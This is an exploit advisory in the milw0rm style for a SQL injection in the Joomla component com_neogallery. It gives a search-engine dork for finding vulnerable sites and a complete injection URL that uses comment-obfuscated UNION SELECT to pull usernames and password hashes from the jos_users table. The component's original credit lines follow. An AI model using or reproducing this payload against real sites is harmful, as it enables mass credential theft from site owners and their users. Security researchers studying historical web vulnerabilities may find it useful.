######################################################################### # # joomla SQL Injection(com_neogallery) # ######################################################################### # # AUTHOR : S@BUN # # HOME : http://www.milw0rm.com/author/1334 # # MAİL : www.milw0rm.com@gmail.com # ######################################################################### # # DORK 1 : allinurl:"com_neogallery" # ########################################################################## EXPLOIT : index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users ######################################################################### # S@BUN i AM NOT HACKER S@BUN ######################################################################### # S@BUN http://www.milw0rm.com S@BUN ######################################################################### # THANKS STROKE ######################################################################### NeoGallery Septembre 2006 Nicolas Cornet - Neoweb This component is released under the GNU/GPL License nicolas@neoweb.fr www.neoweb.fr 1.1 Realise par Nicolas Cornet - Neoweb.]]>